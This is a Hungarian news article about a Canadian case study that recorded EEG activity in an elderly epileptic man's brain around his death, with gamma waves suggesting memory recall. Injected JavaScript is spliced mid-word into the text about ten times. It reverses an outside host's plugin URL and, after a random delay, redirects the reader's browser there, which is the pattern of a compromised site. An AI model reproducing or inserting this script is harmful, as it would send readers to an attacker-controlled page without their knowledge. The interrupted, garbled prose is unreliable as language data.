Egyedülálló adatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokat rögzítettek az agyban zajló aktivitásról, miután egy idős beteg hirtelen elhunyt egy vizsgálat közben. A kutatók a különös felfedezést néhány évvel ezelőtt, 2016-ban dokumentálták, amikor egy 87 éves kanadai férfinél epilepsziát mutattak ki. Az esettanulmányt a kanadai Vancouverben dolgozó kutatók idén február 22-én ismertették – írta a Live Science.
A páciensen EEG-vizsgálatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot végeztek, ami érzékeli az agy elektromos aktivitásában mutatkozó rendellenességeket. A vizsgálat segítségével akartak több információt szerezni arról, hogy a férfi rohamai közben mi játszódik le az agyában. A tragikus, váratlan halálával akaratlanul elkészítették az első felvételt a kutatók egy haldokló agyról.
Mintegy 900 másodpernyi agyi működést sikerült rögzíteniük, közvetlenül a halált megelőző pillanatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokban és utána.
Az anyag mennyisége lehetővé tette, hogy megvizsgálják az agyhullámokat az elhalálozás pillanatában. Azt találták, hogy a szívleállás előtti és utáni 30 másodpercben szokatlan váltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozás történt az agyhullámok aktivitásában. „Közvetlenül a szív leállása előtt és után a neurális oszcillációk egy bizonyos sávjában váltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozásokat tapasztalunk” – írta közleményében Ajmal Zemmar idegsebész, vezető kutató.
A gamma-hullámok frekvenciája 30 és 100 hertz között van, ami a legmagasabb frekvencia az összes oszcilláció közül, és leggyakrabban akkor figyelhetők meg az agyban, amikor az ember memóriaközpontja álom közben aktivizálódik. A gamma-hullámokat a férfi agyműködéséről készült felvételen is észlelték.
A kutatócsoport más típusú oszcillációkról is jegyzett fel adatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokat, azonban a gammahullámok azok, amelyek arra utalnak, hogy a férfi agya az élete egészéből emlékeket játszott vissza.
„Az emlékezet-visszahívásban részt vevő oszcillációk előidézésén keresztül az agy fontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos emlékeket vetíthet le, hasonlóképp a halálközeli élmények során szerzett tapasztalatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokhoz” – magyarázta Ajmal Zemmar.
Mint mondta, abban a 30 másodpercben, hogy megszűnt volna az agy vérellátása, az agyhullámai ugyanazokat a mintákat követték, mint amikor az elme álmot vagy emlékeket idéz fel.
A kutatók arra is figyelmeztettek, hogy nagyon korai lenne kijelenteni azt, hogy az életünkre való visszaemlékezés valós jelenség. Jelenleg nagyon kevés adat áll rendelkezésre, a férfi pedig idős volt és epilepsziában szenvedett, ami megváltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toztatja a gamma-hullámok aktivitását, tehát az agyi aktivitása a halál pillanatában eltért egy epilepszia betegséggel nem küzdő ember agyának aktivitásától. Azt pedig nem lehet bizonyosan tudni, hogy valóban látoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott-e vagy érzékelt-e múltbeli emlékeket.
Ahhoz, hogy konkrét következtetéseket lehessen levonni a halál pillanatában történő visszaemlékezéssel kapcsolatban, sokkal több kutatásra van szükség. A férfi esetéről szóló beszámolót azért csak hat évvel az eset után tették közzé, mert a kutatók abban bíztak, hogy toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}további esettanulmányokat is vizsgálhatnak, eddig azonban nem jártak sikerrel.
